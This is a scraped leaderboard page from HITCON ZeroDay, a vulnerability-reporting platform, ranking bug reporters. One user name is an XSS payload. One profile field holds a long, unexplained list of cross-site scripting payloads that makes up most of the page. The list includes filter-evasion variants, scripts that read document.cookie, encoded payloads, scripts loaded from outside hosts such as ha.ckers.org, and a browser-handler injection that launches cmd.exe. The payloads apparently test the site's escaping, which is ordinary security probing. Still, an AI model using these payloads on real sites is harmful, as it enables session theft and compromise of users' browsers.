HITCON ZeroDay

排行榜

歷史積分排行榜

所有通報者的漏洞通報積分排行

  • Time Limit Exceed

    https://github.com/chenliTW

    • 1
    • Time Limit Exceed
  • 癡情法王

    • 2
    • 癡情法王
  • <svg/onload=alert(1)>

    <svg/onload=alert(1)>

    • 3
    • <svg/onload=alert(1)>
  • Noth

    自學/專業

    • 4
    • Noth
  • Hzllaga

    //wtfsec.org

    • 5
    • Hzllaga
  • Still

    InfoSec is a fascinating world

    • 6
    • Still
  • Dio

    • 7
    • Dio
  • unickz

    • 8
    • unickz
  • Cyku

    • 9
    • Cyku
  • SHIH, FAN-SYUN

    • 10
    • SHIH, FAN-SYUN
  • /dev/hans

    <del>推你進 TDOH 喔</del>

    • 11
    • /dev/hans
  • EAT

    • 12
    • EAT
  • 張睿玹

    南科實中國中部,擅長WEB前端安全

    • 13
    • 張睿玹
  • danny50610

    • 14
    • danny50610
  • 理工先生

    • 15
    • 理工先生
  • haha

    • 16
    • haha
  • taroballz

    My github: https://github.com/curtis992250

    • 17
    • taroballz
  • ( ͡° ͜V ͡°)

    • 18
    • ( ͡° ͜V ͡°)
  •  

                                                                          '';!--"<XSS>=&{()} \"><script>alert(0x000123)</script> \"><sCriPt>alert(0x000123)</sCriPt> \"; alert(0x000123) \"></sCriPt><sCriPt >alert(0x000123)</sCriPt> \"><img Src=0x94 onerror=alert(0x000123)> \"><BODY ONLOAD=alert(0x000123)> '%2Balert(0x000123)%2B' \"><0x000123> '+alert(0x000123)+' %2Balert(0x000123)%2B' '\"--></style></script><script>alert(0x000123)</script> '</style></script><script>alert(0x000123)</script> </script><script>alert(0x000123)</script> </style></script><script>alert(0x000123)</script> %22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E0x94(0x000123)%3C '\"--></style></script><script>alert(0x000123)</script> ';alert(0x000123)' <scr<script>ipt>alert(0x000123)</script> <scr<script>ipt>alert(0x000123)</scr</script>ipt> \"<scr<script>ipt>alert(0x000123)</scr</script>ipt> \"><scr<script>ipt>alert(0x000123)</script> \">'</style></script><script>alert(0x000123)</script> \"></script><script>alert(0x000123)</script> \"></style></script><script>alert(0x000123)</script> aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E <<scr\0ipt/src=http://xss.com/xss.js></script %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E ' onmouseover=alert(/Black.Spook/) "><iframe%20src="http://google.com"%%203E '<script>window.onload=function(){document.forms[0].message.value='1';}</script> x”</title><img src%3dx onerror%3dalert(1)> <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> <script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> <script>alert(document.head.innerHTML.substr(146,20));</script> <script>alert(document.head.childNodes[3].text)</script> <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 <script for=document event=onreadystatechange>getElementById('safe123').click()</script> <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? <var onmouseover="prompt(1)">On Mouse Over</var>? <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=``<div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? <object data=javascript&colon;\u0061l&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script ? <img src ?itworksonchrome?\/onerror = alert(1)??? <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ? <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> "><img src=x onerror=prompt(1);> # credit to rsnake <SCRIPT>alert('XSS');</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> SRC=&#10<IMG 6;avascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <IMG SRC="javascript:alert('XSS')" <SCRIPT>a=/XSS/ \";alert('XSS');// <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> getURL("javascript:alert('XSS')") a="get"; <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <script>alert(1234)</script> <script>prompt(1234)</script> <ScripT>alert(1234)</ScRipT> /<script>alert(1234)</script> <script>var m=<html><a href="//host">link</a> <img+src="http://localhost"> <DIV+STYLE="background-image: url(javascript:alert(1))"> <IMG+DYNSRC="javascript:alert(1);"> <IMG+LOWSRC="javascript:alert(1);"> <isindex+type=image+src=1+onerror=alert(1)> <meta style="xss:expression(open(alert(1)))" /> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(1);\"> <!</textarea <body onload='alert(1)'> <img+<iframe ="1" onerror="alert(1)"> <iframe src="http://localhost"></iframe> <base+href="javascript:alert(1);//"> <bgsound+src="javascript:alert(1);"> <INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);"> <object+data="javascript:alert(0)"> <STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1 <Layer+src="http://localhost"> %3E%3Cbody%20onload=javascript:alert(1)%3E '">><marquee><h1>1</h1></marquee> </br style=a:expression(alert(1))> <font style='color:expression(alert(1))'> <embed 